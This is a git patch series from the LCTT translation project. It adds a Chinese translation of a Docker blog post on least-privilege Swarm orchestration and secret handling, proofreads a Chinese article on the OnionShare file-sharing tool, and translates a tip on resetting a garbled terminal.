are securely attached to the individual node identities. These labels allow administrators to group nodes together into different security zones limiting the exposure of particularly sensitive workloads and any secrets related to them. - -![Docker Swarm Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/67ffa551-d4ae-4522-ba13-4a646a158592-2.jpg?resize=546%2C375&ssl=1) - -### Secure Secret Distribution - -In addition to facilitating the identity issuance process, manager nodes have the important task of storing and distributing any resources needed by a worker. Secrets are treated like any other type of resource, and are pushed down from the manager to the worker over the secure mTLS connection. - -![Docker Secrets](https://i1.wp.com/blog.docker.com/wp-content/uploads/4341da98-2f8c-4aed-bb40-607246344dd8-2.jpg?resize=508%2C326&ssl=1) - -On the hosts, Docker EE ensures that secrets are provided only to the containers they are destined for. Other containers on the same host will not have access to them. Docker exposes secrets to a container as a temporary file system, ensuring that secrets are always stored in memory and never written to disk. This method is more secure than competing alternatives, such as [storing them in environment variables][12]. Once a task completes the secret is gone forever. - -### Storing secrets - -On manager hosts secrets are always encrypted at rest. By default, the key that encrypts these secrets (known as the Data Encryption Key, DEK) is also stored in plaintext on disk. This makes it easy for those with minimal security requirements to start using Docker Swarm mode. - -However, once you are running a production cluster, we recommend you enable auto-lock mode. When auto-lock mode is enabled, a newly rotated DEK is encrypted with a separate Key Encryption Key (KEK). This key is never stored on the cluster; the administrator is responsible for storing it securely and providing it when the cluster starts up. This is known as unlocking the swarm. - -Swarm mode supports multiple managers, relying on the Raft Consensus Algorithm for fault tolerance. Secure secret storage scales seamlessly in this scenario. Each manager host has a unique disk encryption key, in addition to the shared key. Furthermore, Raft logs are encrypted on disk and are similarly unavailable without the KEK when in autolock mode. - -### What happens when a node is compromised? - -![Docker Secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/2a78b37d-bbf0-40ee-a282-eb0900f71ba9-2.jpg?resize=502%2C303&ssl=1) - -In traditional orchestrators, recovering from a compromised host is a slow and complicated process. With Swarm mode, recovery is as easy as running the docker node rm command. This removes the affected node from the cluster, and Docker will take care of the rest, namely re-balancing services and making sure other hosts know not to talk to the affected node. - -As we have seen, thanks to least privilege orchestration, even if the attacker were still active on the host, they would be cut off from the rest of the network. The host’s certificate — its identity — is blacklisted, so the managers will not accept it as valid. - -# Conclusion - -Docker EE with Swarm mode ensures security by default in all key areas of orchestration: - -* Joining the cluster. Prevents malicious nodes from joining the cluster. - -* Organizing hosts into security zones. Prevents lateral movement by attackers. - -* Scheduling tasks. Tasks will be issued only to designated and allowed nodes. - -* Allocating resources. A malicious node cannot “steal” another’s workload or resources. - -* Storing secrets. Never stored in plaintext and never written to disk on worker nodes. - -* Communicating with the workers. Encrypted using mutually authenticated TLS. - -As Swarm mode continues to improve, the Docker team is working to take the principle of least privilege orchestration even further. The task we are tackling is: how can systems remain secure if a manager is compromised? The roadmap is in place, with some of the features already available such as the ability of whitelisting only specific Docker images, preventing managers from executing arbitrary workloads. This is achieved quite naturally using Docker Content Trust. - --------------------------------------------------------------------------------- - -via: https://blog.docker.com/2017/10/least-privilege-container-orchestration/ - -作者:[Diogo Mónica ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://blog.docker.com/author/diogo/ -[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration&summary=The%20Docker%20platform%20and%20the%20container%20has%20become%20the%20standard%20for%20packaging,%20deploying,%20and%20managing%20applications.%20In%20order%20to%20coordinate%20running%20containers%20across%20multiple%20nodes%20in%20a%20cluster,%20a%20key%20capability%20is%20required:%20a%20container%20orchestrator.Orchestrators%20are%20responsible%20for%20critical%20clustering%20and%20scheduling%20tasks,%20such%20as:%20%20%20%20Managing%20... -[2]:http://www.reddit.com/submit?url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration -[3]:https://plus.google.com/share?url=http://dockr.ly/2yZoNdy -[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2yZoNdy&t=Least%20Privilege%20Container%20Orchestration -[5]:https://blog.docker.com/author/diogo/ -[6]:https://blog.docker.com/tag/docker-orchestration/ -[7]:https://blog.docker.com/tag/docker-secrets/ -[8]:https://blog.docker.com/tag/docker-security/ -[9]:https://blog.docker.com/tag/docker-swarm/ -[10]:https://blog.docker.com/tag/least-privilege-orchestrator/ -[11]:https://blog.docker.com/tag/tls/ -[12]:https://diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/ - - diff --git a/translated/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md b/translated/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md new file mode 100644 index 0000000000..7cb8fffdb1 --- /dev/null +++ b/translated/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md @@ -0,0 +1,176 @@ +# 最小权限的容器协调器 + + +Docker 平台和容器已经成为打包、部署、和管理应用程序的标准。为了在一个集群内协调跨节点的容器,必须有一个关键的能力:一个容器协调器。 + +![container orchestrator](https://i0.wp.com/blog.docker.com/wp-content/uploads/f753d4e8-9e22-4fe2-be9a-80661ef696a8-3.jpg?resize=536%2C312&ssl=1) + +对于关键的集群化以及计划的任务,协调器是起重大作用的,比如: + +* 管理容器计划和资源分配。 + +* 支持服务发现和无缝(hitless)应用程序部署。 + +* 分配应用程序运行必需的资源。 + +不幸的是,在这种环境下,协调器的分布式特性和资源的短暂性使得确保协调器的安全是一个极具挑战性的任务。在这篇文章中,我们将讨论容器协调器安全模型中没有考虑到的、但是很重要的方面的详细情况,以及 Docker 企业版中如何使用内置的编排性能、Swarm 模式,去克服这些问题。 + +诱因和威胁模型 +============================================================ + +使用 swarm 模式的 Docker 企业版的其中一个主要目标是提供一个内置安全特性的协调器。为达到这个目标,我们部署了第一个在我们心目中认为的最小权限原则设计的容器协调器。 + +在计算机科学中,一个分布式系统所要求的最小权限原则是,系统中的每个参与着仅仅能访问它正当目的所需要的信息和资源。不是更多,也不是更少。 + +> #### “一个进程必须仅仅能去访问它的正当目的所需要的信息和资源” + +#### 最小权限原则 + +在一个 Docker 企业版集群中的每个节点分配的角色:既不是管理者(manager),也不是工人(worker)。这些角色为节点定义了一个很粗粒度的权限级别:管理和运行各自的任务。尽管如此,不用理会它的内置的角色,通过使用加密的方式,来保证一个节点仅仅有执行它的任务所需要的信息和资源。结果是,防止大多数的复杂的攻击者模式:攻击者控制底层通讯网络,或者甚至是攻陷的集群节点,确保集群安全变得更容易了。 + +# 内核缺省安全 + +这是一个很老的安全最大化状态:如果它不是缺省的,没有一个使用它。Docker Swarm 模式将内核缺省安全这一概念融入了内核,并且使用这一机制去解决协调器生命周期中三个很难的并且很重要的部分: + +1. 可信引导和节点引入。 + +2. 节点身份发布和管理。 + +3. 经过认证、授权、和加密的信息存储和传播。 + +我们来分别看一下这三个部分 + +### 可信引导和节点引入 + +确保集群安全的第一步,没有别的,就是严格控制成员和身份。管理员不能依赖它们节点的身份,并且在节点之间强制实行绝对的负载隔离。这意味着,未授权的节点不能允许加入到集群中,并且,已经是集群一部分的节点不能改变身份,突然去伪装成另一个节点。 + +为解决这种情况,通过 Docker 企业版 Swarm 模式管理的节点,维护了健壮的、不可改变的身份。期望的特性是,通过使用两种关键的构建块去保证加密: + +1. 为集群成员使用安全加入令牌。 + +2. 从一个集中化的认证机构发行的内嵌唯一身份的证书。 + +### 加入 Swarm + +去安全加入 Swarm,需要这个节点的令牌拷贝。在集群内的每个操作角色中,令牌是独一无二的 — 那里现在有两种类型的节点:工人(workers)和管理者(managers)。由于这种分隔,拥有一个工人令牌的节点将不允许以管理者角色加入到集群。唯一的方式是通过 swarm 的管理 API,去向集群管理者请求一个特殊的令牌。 + +令牌是安全的并且是随机生成的,它也有一个使得令牌漏洞更容易去检测的特殊语法:一个可以在你的日志和仓库中很容易监视的特殊前缀。幸运的是,即便发现一个漏洞,令牌也可以很容易去更新,并且,推荐你经常去更新它们 — 特别是,在一段时间中你的集群不进行扩大的情况下。 + +![Docker Swarm](https://i1.wp.com/blog.docker.com/wp-content/uploads/92d171d4-52c7-4702-8143-110c6f52017c-2.jpg?resize=547%2C208&ssl=1) + +### 引导信任 + +作为它的身份标识创建的一部分,一个新的节点将向任意一个网络管理者请求发布一个新的身份。但是,在我们下面的威胁模型中,所有的通讯可以被一个第三方拦截。这种请求存在的问题是:一个节点怎么知道与它进行对话的对方是合法的管理者? + +![Docker Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/94e3fef0-5bd2-4970-b9e9-25b566d926ad-2.jpg?resize=528%2C348&ssl=1) + +幸运的是,Docker 有一个内置机制可以避免这种情况。加入令牌,它被主机用于加入 Swarm,包含一个根 CA 证书的哈希串。所以,主机可以使用单向 TLS,并且使用这个哈希串去验证它加入的 Swarm 是否正确:如果管理者持有的证书没有被正确的 CA 哈希串签名,节点就知道它不可信任。 + +### 节点身份发布和管理 + +在一个 Swarm 中,身份标识是内嵌在每个节点都单独持有的一个 x509 证书中。在一个最小权限原则的表现中,证书的私钥被绝对限制到主机的原始位置。尤其是,管理者不能访问除了它自己的私钥以外的任何一个私钥。 + +### 身份发布 + +去接收它们的证书而无需共享它们的私钥,新的主机通过发布一个证书签名请求(CSR)来开始,管理者收到证书签名请求之后,转换成一个证书。这个证书成为这个新的主机的身份标识,使这个节点成为 Swarm 的一个完全合格成员! + +#### +![](https://i0.wp.com/blog.docker.com/wp-content/uploads/415ae6cf-7e76-4ba8-9d84-6d49bf327d8f-2.jpg?resize=548%2C350&ssl=1) + +当和安全引导机制一起使用时,发行身份标识的这个机制去加入节点是缺省安全的:所有的通讯部分都是经过认证的、授权的,并且非敏感信息从来都不会以明文方式进行交换。 + +### 身份标识延期 + +尽管如此,给一个 Swarm 中安全地加入节点,仅仅是 “故事” 的一部分。为降低证书的漏洞或者失窃造成的影响,并且移除管理 CRL 列表的复杂性,Swarm 模式为身份标识使用了较短存活周期的证书。这些证书缺省情况下三个月后将过期,但是,也可以配置为一个小时后即刻过期! + +![Docker secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/55e2ab9a-19cd-465d-82c6-fa76110e7ecd-2.jpg?resize=556%2C365&ssl=1) + +这个较短的证书过期时间,意味着不能手动去处理证书更新,所以,通常会使用一个 PKI 系统。对于 Swarm,所有的证书是以一种不中断的方式进行自动更新的。这个过程很简单:使用一个相互认证的 TLS 连接去证明一个特定身份标识的所有者,一个 Swarm 节点定期生成一个新的公钥/私钥密钥对并且用相关的 CSR 去签名发送,创建一个维持相同身份标识的完整的新证书。 + +### 经过认证、授权、和加密的信息存储和传播。 + +在一个正常的 Swarm 的操作中,发送到工人(worker)节点去运行的关于任务的信息。这里不仅仅包含将被一个节点运行的容器的信息;也包含那个容器运行所必需的资源的所有的信息,包括敏感的秘密,比如,私钥、密码、和 API 令牌。 + +### 传输安全 + +事实上,参与 Swarm 的每个节点都拥有一个独一无二的 X509 格式的证书,因此,节点之间的通讯安全是没有问题的:节点使用它们各自的证书,与另一个连接方进行相互认证、继承机密、真实性、和 TLS 的完整性。 + +![Swarm Mode](https://i0.wp.com/blog.docker.com/wp-content/uploads/972273a3-d9e5-4053-8fcb-a407c8cdcbf6-2.jpg?resize=347%2C271&ssl=1) + +关于 Swarm 模式的一个有趣的细节是,本质上它是使用了一个推送模式:仅管理者被允许去发送信息到工人们(workers)— 显著降低了暴露在低权限工人节点面前的管理者节点的攻击面。 + +### 将负载严格隔离进安全区域 + +管理者节点的其中一个责任是,去决定发送到每个工人(worker)节点的任务是什么。管理者节点使用多种策略去做这个决定;根据每个节点和每个负载的特性,去跨 Swarm 去安排负载。 + +在使用 Swarm 模式的 Docker 企业版中,管理者通过使用附加到每个单个节点标识上的安全标签,去影响这些安排决定。这些标签允许管理者将节点组与不同的安全区域连接到一起,以限制敏感负载暴露,以及使相关秘密信息更安全。 + +![Docker Swarm Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/67ffa551-d4ae-4522-ba13-4a646a158592-2.jpg?resize=546%2C375&ssl=1) + +### 安全分发秘密 + +除了加快身份标识发布过程之外,管理者节点还有存储和分发工人节点所需要的任何资源的任务。像任何其它类型的资源一样处理秘密,并且基于安全的 mTLS 连接,从管理者推送到工人节点。 + +![Docker Secrets](https://i1.wp.com/blog.docker.com/wp-content/uploads/4341da98-2f8c-4aed-bb40-607246344dd8-2.jpg?resize=508%2C326&ssl=1) + +在主机上,Docker 企业版能确保秘密仅提供给它们指定的容器。在同一个主机上的其它容器并不能访问它们。Docker 以一个临时文件系统的方式显露秘密给一个容器,确保秘密总是保存在内存中,并且从不写入到磁盘。这种方式比其它竞争的替代者更加安全,比如,[在环境变量中存储它们][12]。一旦这个任务完成,这个秘密将永远消失。 + +### 存储秘密 + +在管理者主机上的秘密总是加密静止的。缺省情况下,加密这些秘密的密钥(被称为数据加密密钥,DEK)是以明文的方式存储在硬盘上的。这使得那些对安全性要求较低的人可以轻松地去使用 Docker Swarm 模式。 + +但是,如果你运行一个生产集群,我们推荐你启用自动锁定模式。当自动锁定模式启用后,一个重新更新过的 DEK 被一个独立的加密密钥加密(KEK)。这个密钥从不被存储在集群中;管理者有责任将它存储在一个安全可靠的地方,并且当集群启动的时候可以提供它。这就是所谓的 “解锁” Swarm。 + +根据 Raft 故障容错一致性算法,Swarm 模式支持多个管理者。在这个场景中,无缝扩展了秘密存储的安全性。每个管理者主机除了共享密钥之外 ,还有一个唯一的磁盘加密密钥。幸运的是,Raft 日志在磁盘上也是加密的,并且,在自动锁定模式下,没有 KEK 同样是不可访问的。 + +### 当一个节点被攻陷后发生了什么? + +![Docker Secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/2a78b37d-bbf0-40ee-a282-eb0900f71ba9-2.jpg?resize=502%2C303&ssl=1) + +在传统的协调器中,挽回一台被攻陷的主机是一个缓慢而复杂的过程。使用 Swarm 模式,恢复它就像运行一个 Docker 节点的 rm 命令一样容易。这是从集群中删除一个受影响的节点,而 Docker 将去处理剩下的事情,即,重新均衡负载,并且确保其它的主机已经知道,而不会去与受影响的节点通讯。 + +正如我们看到的那样,感谢最小权限协调器,甚至是,如果攻击者在主机上持续活动,它们将被从剩余的网络上切断。主机的证书 — 它的身份标识 — 被列入黑名单,因此,管理者也不能有效访问它。 + +# 结论 + +使用 Swarm 模式的 Docker 企业版,在缺省情况下确保了协调器的所有关键区域的安全: + +* 加入集群。阻止恶意节点加入到集群。 + +* 安排主机进入安全区域。阻止攻击者的横向移动。 + +* 安排任务。任务将仅被委派到允许的节点。 + +* 分配资源。恶意节点不能 “盗取” 其它的负载或者资源。 + +* 存储秘密。从不明文保存并且从不写入到工人节点的磁盘上。 + +* 与工人节点的通讯。使用相互认证的 TLS 加密。 + +因为 Swarm 模式持续提升,Docker 团队正在努力将最小权限原则进一步推进。我们正在处理的一个任务是:如果一个管理者被攻陷了,怎么去保证剩下的节点的安全?路线图已经有了,其中一些功能已经可以使用,比如,白名单功能,仅允许特定的 Docker 镜像,阻止管理者随意运行负载。这是通过 Docker 可信内容来实现的。 + +-------------------------------------------------------------------------------- + +via: https://blog.docker.com/2017/10/least-privilege-container-orchestration/ + +作者:[Diogo Mónica][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.docker.com/author/diogo/ +[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration&summary=The%20Docker%20platform%20and%20the%20container%20has%20become%20the%20standard%20for%20packaging,%20deploying,%20and%20managing%20applications.%20In%20order%20to%20coordinate%20running%20containers%20across%20multiple%20nodes%20in%20a%20cluster,%20a%20key%20capability%20is%20required:%20a%20container%20orchestrator.Orchestrators%20are%20responsible%20for%20critical%20clustering%20and%20scheduling%20tasks,%20such%20as:%20%20%20%20Managing%20... +[2]:http://www.reddit.com/submit?url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration +[3]:https://plus.google.com/share?url=http://dockr.ly/2yZoNdy +[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2yZoNdy&t=Least%20Privilege%20Container%20Orchestration +[5]:https://blog.docker.com/author/diogo/ +[6]:https://blog.docker.com/tag/docker-orchestration/ +[7]:https://blog.docker.com/tag/docker-secrets/ +[8]:https://blog.docker.com/tag/docker-security/ +[9]:https://blog.docker.com/tag/docker-swarm/ +[10]:https://blog.docker.com/tag/least-privilege-orchestrator/ +[11]:https://blog.docker.com/tag/tls/ +[12]:https://diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/ + + From 6001b078f58cddc2b1fea59424209d0802397dd4 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 26 Dec 2017 18:26:01 +0800 Subject: [PATCH 0797/1627] PRF&PUB:20171208 OnionShare - Share Files Anonymously.md @geekpi --- ...08 OnionShare - Share Files Anonymously.md | 54 +++++++++---------- 1 file changed, 26 insertions(+), 28 deletions(-) rename {translated/tech => published}/20171208 OnionShare - Share Files Anonymously.md (53%) diff --git a/translated/tech/20171208 OnionShare - Share Files Anonymously.md b/published/20171208 OnionShare - Share Files Anonymously.md similarity index 53% rename from translated/tech/20171208 OnionShare - Share Files Anonymously.md rename to published/20171208 OnionShare - Share Files Anonymously.md index f501bea881..03ee96b674 100644 --- a/translated/tech/20171208 OnionShare - Share Files Anonymously.md +++ b/published/20171208 OnionShare - Share Files Anonymously.md @@ -1,51 +1,49 @@ -OnionShare - 匿名共享文件 +OnionShare:匿名共享文件 ====== + +![](http://www.theitstuff.com/wp-content/uploads/2017/12/OnionShare-Share-Files-Anonymously.jpg) + 在这个数字世界中,我们通过互联网使用 Dropbox、Mega、Google Drive 等不同云存储分享我们的媒体、文档和重要文件。但是每个云存储都有两个主要问题,一个是大小和另一个安全。习惯 Bit Torrent 之后,大小已经不是问题了,但安全性仍旧是。 -你即使通过安全云服务发送文件,公司也会注意到这些文件,如果这些文件是保密的,政府甚至可以拥有它们。因此,为了克服这些问题,我们使用 OnionShare,如它的名字那样它使用洋葱网络也就是 Tor 来匿名分享文件给任何人。 +你即使通过安全的云服务发送文件,该公司也会注意到这些文件,如果这些文件是保密的,政府甚至可以拿到它们。因此,为了克服这些问题,我们使用 OnionShare,如它的名字那样它使用洋葱网络也就是 Tor 来匿名分享文件给任何人。 ### 如何使用 **OnionShare**? - * 首先下载 [OnionShare][1] 和 [Tor浏览器][2]。下载后安装它们。 - - +首先下载 [OnionShare][1] 和 [Tor浏览器][2]。下载后安装它们。 [![install onionshare and tor browser][3]][3] - * 现在从开始菜单打开 OnionShare - - +现在从开始菜单打开 OnionShare [![onionshare share files anonymously][4]][4] - * 点击添加并添加一个文件/文件夹共享。 -  * 点击开始分享。它会产生一个 .onion 网址,你可以与你的收件人分享这个网址。 - +点击添加并添加一个文件/文件夹共享。 +点击开始分享。它会产生一个 .onion 网址,你可以与你的收件人分享这个网址。 [![share file with onionshare anonymously][5]][5] - * 从 URL 下载文件,复制 URL 并打开 Tor 浏览器并粘贴。打开 URL 并下载文件/文件夹。 - - +从 URL 下载文件,复制 URL 并打开 Tor 浏览器并粘贴。打开 URL 并下载文件/文件夹。 [![receive file with onionshare anonymously][6]][6] -### **OnionShare** 的开始 +### OnionShare 的起源 -几年前,Glenn Greenwald 发现他从 Edward Snowden 收到的一些 NSA 的文件已经被损坏。但他需要文件,并决定通过使用 USB 获取文件。这并不成功。 +几年前,Glenn Greenwald 发现他从 Edward Snowden 收到的一些 NSA 的文件已经被损坏。但他需要该文件,并决定通过使用 USB 获取那些文件。这并不成功。 -在阅读了 Greenwald 写的书后,The Intercept 的安全专家 Micah Lee 发布了 OnionShare - 一个简单的免费软件,可以匿名和安全地共享文件。他创建了一个程序,通过一个被匿名软件 Tor 加密和保护的直接通道来共享大数据转储,使窃取者难以获取文件。 +在阅读了 Greenwald 写的书后,The Intercept 的安全专家 Micah Lee 发布了 OnionShare —— 一个简单的免费软件,可以匿名和安全地共享文件。他创建了一个程序,通过一个被匿名软件 Tor 加密和保护的直接通道来分享大型数据转储,使窃取者难以获取文件。 -### **OnionShare** 如何工作? +### OnionShare 如何工作? OnionShare 在 127.0.0.1 上启动了一个 Web 服务器,用于在随机端口上共享文件。它从有 6880 个单词的单词列表中选择任意两个单词,称为 slug。它使服务器可以作为 Tor 洋葱服务发送文件。最终的 URL 看起来像这样: -`http://qx2d7lctsnqwfdxh.onion/subside-durable` +``` +http://qx2d7lctsnqwfdxh.onion/subside-durable +``` -OnionShare 在下载后关闭。有一个选项允许多次下载文件。这使得该文件不再在互联网上可以得到。 +OnionShare 在下载后关闭。有一个选项允许多次下载文件。这使得该文件在互联网上不能再次得到。 -### 使用 **OnionShare** 好处 +### 使用 OnionShare 好处 其他网站或程序可以访问你的文件:发件人使用 OnionShare 共享的文件不存储在任何服务器上。它直接托管在发件人的系统上。 @@ -64,14 +62,14 @@ via: https://www.theitstuff.com/onionshare-share-files-anonymously-2 作者:[Anirudh Rayapeddi][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 [a]:https://www.theitstuff.com -[1]https://onionshare.org/ -[2]https://www.torproject.org/projects/torbrowser.html.en -[3]http://www.theitstuff.com/wp-content/uploads/2017/12/Icons.png -[4]http://www.theitstuff.com/wp-content/uploads/2017/12/Onion-Share.png -[5]http://www.theitstuff.com/wp-content/uploads/2017/12/With-Link.png -[6]http://www.theitstuff.com/wp-content/uploads/2017/12/Tor.png +[1]:https://onionshare.org/ +[2]:https://www.torproject.org/projects/torbrowser.html.en +[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/Icons.png +[4]:http://www.theitstuff.com/wp-content/uploads/2017/12/Onion-Share.png +[5]:http://www.theitstuff.com/wp-content/uploads/2017/12/With-Link.png +[6]:http://www.theitstuff.com/wp-content/uploads/2017/12/Tor.png From 5bb17949891f8f1bd86d0b9531c27fd692b637ab Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 26 Dec 2017 18:28:03 +0800 Subject: [PATCH 0798/1627] =?UTF-8?q?translate=20done=20at=202017=E5=B9=B4?= =?UTF-8?q?=2012=E6=9C=88=2026=E6=97=A5=20=E6=98=9F=E6=9C=9F=E4=BA=8C=2018?= =?UTF-8?q?:28:03=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... on a Linux - Unix - OS X - BSD Systems.md | 56 ------------------- ... on a Linux - Unix - OS X - BSD Systems.md | 55 ++++++++++++++++++ 2 files changed, 55 insertions(+), 56 deletions(-) delete mode 100644 sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md create mode 100644 translated/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md diff --git a/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md b/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md deleted file mode 100644 index 436e143f82..0000000000 --- a/sources/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md +++ /dev/null @@ -1,56 +0,0 @@ -translating by lujun9972 -Fix The Display and Console Gibberish on a Linux / Unix / OS X / BSD Systems -====== -Sometimes my R & D result in the weird output on the screen。For example,accidentally I run cat command over binary file - cat /sbin/*。You will be not able to access your bash/ksh/zsh based terminal。It will be full of wired character sequences that can lock down your display。These characters will hide what you type or character displayed into strange symbols。To clear gibberish all over the screen use the following method。This article describes how to really clear the terminal screen or reset terminal in Linux or Unix-like system。 - - -## The clear command - -The clear command clears your screen including its scrollback buffer。 -`$ clear` -You can press CTRL+L to clear screen too。However,clear command won't clear the terminal screen。Use the following methods to really clear the terminal so you get a get back a good working terminal。 - -## How to fix the display using the rest command - -Here is my console with gibberish all over the screen: -[![Fig.01:Bash fix the display][1]][2] - -To fix the display just type the reset command。It will initialization terminal again for you: -`$ reset` -OR -`$ tput reset` - -If reset command failed to work type the following command to restore the session to a normal state: -`$ stty sane` - -Press CTRL + L to clear the screen (or type the clear command): -`$ clear` - -## Use ANSI escape sequence to really clear the bash terminal - -Another option is to type the following ANSI escape sequence: -``` -clear -echo -e "\033c" -``` - -Sample outputs from both commands: -[![Animated gif 01:Fix Unix Console Gibberish Command Demo][3]][4] -Read man pages of stty and reset for more information stty(1),reset(1),bash(1) - - --------------------------------------------------------------------------------- - -via: https://www.cyberciti.biz/tips/bash-fix-the-display.html - -作者:[Vivek Gite][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.cyberciti.biz -[1]:https://www.cyberciti.biz/media/new/tips/2006/08/bash-fix-terminal.png -[2]:https://www.cyberciti.biz/media/uploads/tips/2006/08/bash-fix-terminal.png -[3]:https://www.cyberciti.biz/media/new/tips/2006/08/unix-linux-console-gibberish.gif -[4]:https://www.cyberciti.biz/tips/bash-fix-the-display.html/unix-linux-console-gibberish diff --git a/translated/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md b/translated/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md new file mode 100644 index 0000000000..285b3fe935 --- /dev/null +++ b/translated/tech/20060808 Fix The Display and Console Gibberish on a Linux - Unix - OS X - BSD Systems.md @@ -0,0 +1,55 @@ +修复 Linux / Unix / OS X / BSD 系统 控制台上的显示垃圾 +====== +有时我的 R & D( 研究与发展??) 会在屏幕上输出一些奇怪的东西。比如,有一次我不小心用 cat 命令查看了一下二进制文件的内容 - `cat /sbin/*`。这种情况下你将无法再访问终端里的 bash/ksh/zsh 了。大量的奇怪字符充斥了你的终端 y。这些字符会隐藏你输入的内容和要显示的字符,取而代之的是一些奇怪的符号。要清理掉这些屏幕上的垃圾可以使用以下方法。本文就将向你描述在 Linux/ 类 Unix 系统中如何真正清理终端屏幕或者重置终端。 + + +## clear 命令 + +clear 命令会清理掉屏幕内容,连带它的回滚缓存区一起也会被清理掉。 +`$ clear` +你也可以按下 `CTRL+L` 来清理屏幕。然而,clear 命令并不会清理掉终端屏幕(译者注:这句话比较难理解,应该是指的运行 clear 命令并不是真正的把以前显示的内容删掉,你还是可以通过向上翻页看到之前显示的内容)。使用下面的方法才可以真正地清空终端,使你的终端恢复正常。 + +## 使用 reset 命令修复显示 + +下面图片中,控制台的屏幕上充满了垃圾信息: +[![Fig.01:Bash fix the display][1]][2] + +要修复正常显示,只需要输入 `reset` 命令。它会为你再初始化一次终端: +`$ reset` +或者 +`$ tput reset` + +如果 `reset` 命令还不行,那么输入下面命令来让绘画回复到正常状态: +`$ stty sane` + +按下 `CTRL + L` 来清理屏幕 (或者输入 clear 命令): +`$ clear` + +## 使用 ANSI 转义序列来真正地晴空 bash 终端 + +另一种选择是输入下面的 ANSI 转义序列: +``` +clear +echo -e "\033c" +``` + +下面是这两个命令的输出示例: +[![Animated gif 01:Fix Unix Console Gibberish Command Demo][3]][4] +更多信息请阅读 stty 和 reset 的 man 页 stty(1),reset(1),bash(1) + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/tips/bash-fix-the-display.html + +作者:[Vivek Gite][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/media/new/tips/2006/08/bash-fix-terminal.png +[2]:https://www.cyberciti.biz/media/uploads/tips/2006/08/bash-fix-terminal.png +[3]:https://www.cyberciti.biz/media/new/tips/2006/08/unix-linux-console-gibberish.gif +[4]:https://www.cyberciti.biz/tips/bash-fix-the-display.html/unix-linux-console-gibberish From 51ccd04c68ca3e6354779d59351afb11d5465730 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Tue, 26 Dec 2017 19:39:27 +0800 Subject: [PATCH 0799/1627] Translating by qhwdw --- ...udy of Programming Languages and Code Quality in GitHub.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md b/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md index bb6b5bf693..f683d77c43 100644 --- a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md +++ b/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md @@ -1,4 +1,4 @@ - +Translating by qhwdw A Large-Scale Study of Programming Languages and Code Quality in GitHub ============================================================ @@ -411,3 +411,5 @@ via: https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-progra [91]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop [92]:https://cacm.acm.org/magazines/2017/10/221326-a-large-scale-study-of-programming-languages-and-code-quality-in-github/fulltext?imm_mid=0f7103&cmp=em-prog-na-na-newsltr_20171007#PageTop 